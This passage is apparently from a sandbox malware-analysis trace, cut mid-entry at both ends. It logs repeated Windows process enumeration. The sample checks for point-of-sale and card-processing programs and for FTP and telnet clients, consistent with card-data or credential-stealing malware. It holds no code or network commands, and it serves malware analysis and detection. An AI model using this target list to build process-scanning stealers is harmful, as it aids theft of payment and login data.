th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0202.551] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0202.554] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0202.556] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0202.562] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0202.565] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0202.567] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0202.570] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0202.572] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0202.624] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0202.626] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0202.628] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0202.630] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0202.632] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0202.635] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0202.641] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0202.642] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0202.644] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0202.646] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0202.647] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0202.649] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0202.651] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.655] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0202.657] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0202.658] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0202.660] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xccc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x500, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 0 [0202.662] CloseHandle (hObject=0xde8) returned 1 [0202.662] Sleep (dwMilliseconds=0x64) [0202.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde8 [0202.795] Process32First (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.796] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0202.798] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0202.800] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.801] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.803] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.804] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.806] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.810] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.812] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.813] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.815] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.817] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.818] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.820] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.821] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.874] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.876] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.878] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.880] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.882] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0202.884] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0202.890] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.892] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0202.895] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0202.897] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0202.899] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0202.906] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0202.908] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.911] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0202.913] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.915] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0202.969] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0202.971] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0202.972] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0202.974] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0202.976] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0202.978] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0202.985] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0202.987] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0202.989] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0202.991] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0202.993] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0202.998] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0202.999] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0203.001] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0203.003] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0203.004] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0203.006] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0203.007] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0203.009] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0203.107] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0203.109] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0203.111] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0203.113] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0203.114] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0203.116] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0203.117] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0203.123] Process32Next (in: hSnapshot=0xde8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 